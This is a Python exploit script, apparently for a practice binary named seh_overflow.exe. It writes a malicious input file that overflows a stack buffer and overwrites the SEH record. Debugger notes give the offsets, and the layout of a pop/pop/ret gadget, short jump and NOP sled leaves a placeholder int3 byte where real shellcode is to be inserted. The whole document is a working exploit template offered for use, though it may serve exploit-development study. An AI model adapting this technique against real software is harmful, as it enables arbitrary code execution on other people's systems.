# Name : Abhinav Thakur
# Email: [email protected]
# Description: This exploit takes advantage of a stack buffer overflow, overwriting the SEH linked-list
# record (next-pointer and handler) to bypass SafeSEH and achieve arbitrary code execution.
# Usage : seh_overflow.exe C:\malacious_input_file.bin
# Useful information
# 12fb6c : address of buffer
# 12ffc4 : address of return pointer (1112 bytes from buffer)
# 12ffb0 : SEH record (doubly-linked list entry: next-pointer, handler), 1092 bytes from buffer
#          (apparently its original contents: next 12ffe0, handler 4016f5)
# fread() is asking for 2048 bytes
# offset to return pointer = 1112 bytes
# after finding "\xcc" by >'lm' and >'s seh_overflow l6000 cc' at address 40109a
# we overwrite the function pointer with 40109a to see the status of current
# registers and stack to find a relative address to jump to shellcode. We get
# the an in range stack address $esp+0x8 (12ffb0). But this adderss is just
# before our function pointer(exception handler). So we now find the instruction
# 'jmp esp+0x8' in the modules.
# 004015c1 5b pop ebx
# 004015c2 5d pop ebp
# 004015c3 c3 ret
# e9 af fb ff ff : jmp 12fb6c
import struct
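# --- payload layout -----------------------------------------------------------
# Offsets are relative to the start of the overflowed buffer and come from the
# debugger notes above. They are specific to this build of seh_overflow.exe
# (fixed stack address 0x12fb6c, gadget at 0x4015c1) and will not transfer to
# another binary, compiler, or an ASLR-enabled target.
SEH_RECORD_OFFSET = 1092   # start of the SEH record: [next-pointer][handler]
TAIL_PADDING = 1112 - 5    # trailing filler after the 5-byte jmp (as in the original layout)
FREAD_SIZE = 2048          # fread() copies at most this many bytes from the file

# 'eb 06 00 00' as little-endian bytes = short jmp +6: executed when the
# pop/pop/ret gadget returns into this field, it hops over the handler
# address and lands on JMP_TO_BUFFER.
NEXT_SEH_POINTER = 0x000006EB
# pop ebx / pop ebp / ret at 004015c1 in the executable's own .code segment.
SEH_HANDLER_GADGET = 0x4015C1
# 'e9 af fb ff ff' = jmp 0x0012fb6c, the buffer start; the NOP sled there
# slides into the shellcode placed just below the SEH record.
JMP_TO_BUFFER = b"\xe9\xaf\xfb\xff\xff"

# The target program reads this path (see Usage above); keep it unchanged.
OUTPUT_PATH = r"C:\malacious_input_file.bin"

# Put up the shellcode here (as bytes). \xcc is an int3, so a debugger
# attached to the target breaks as soon as control reaches the sled.
shellcode = b"\xcc"


def build_payload(shellcode: bytes) -> bytes:
    """Assemble the malicious input-file contents around *shellcode*.

    Layout (offsets from buffer start):
        0      .. 1092  NOP sled followed by *shellcode* (shellcode ends at 1092)
        1092   .. 1096  overwritten next-SEH pointer  (short jmp +6)
        1096   .. 1100  overwritten handler           (pop/pop/ret gadget)
        1100   .. 1105  jmp back to the buffer start
        1105   ..       NOP filler so the file is larger than the 2048 bytes
                        fread() asks for (the excess is simply never read)

    Args:
        shellcode: raw machine code to run; must fit in front of the SEH record.

    Returns:
        The complete file contents as ``bytes``.

    Raises:
        TypeError: if *shellcode* is a ``str`` (would silently corrupt the
            layout on Python 3).
        ValueError: if *shellcode* is longer than ``SEH_RECORD_OFFSET`` bytes;
            the original script produced a broken, shorter payload in that case.
    """
    if not isinstance(shellcode, (bytes, bytearray)):
        raise TypeError("shellcode must be bytes, not %s" % type(shellcode).__name__)
    if len(shellcode) > SEH_RECORD_OFFSET:
        raise ValueError(
            "shellcode is %d bytes; at most %d fit before the SEH record"
            % (len(shellcode), SEH_RECORD_OFFSET)
        )
    # "<I" pins 4-byte little-endian, which is what the x86 target expects;
    # the original "I" used the *generator's* native order/size instead.
    parts = [
        b"\x90" * (SEH_RECORD_OFFSET - len(shellcode)),
        bytes(shellcode),
        struct.pack("<I", NEXT_SEH_POINTER),
        struct.pack("<I", SEH_HANDLER_GADGET),
        JMP_TO_BUFFER,
        b"\x90" * TAIL_PADDING,
    ]
    return b"".join(parts)


payload = build_payload(shellcode)

if __name__ == "__main__":
    # Binary mode: in text mode the platform may rewrite 0x0a bytes as CRLF,
    # which would corrupt any real shellcode containing a newline byte.
    with open(OUTPUT_PATH, "wb") as fo:
        fo.write(payload)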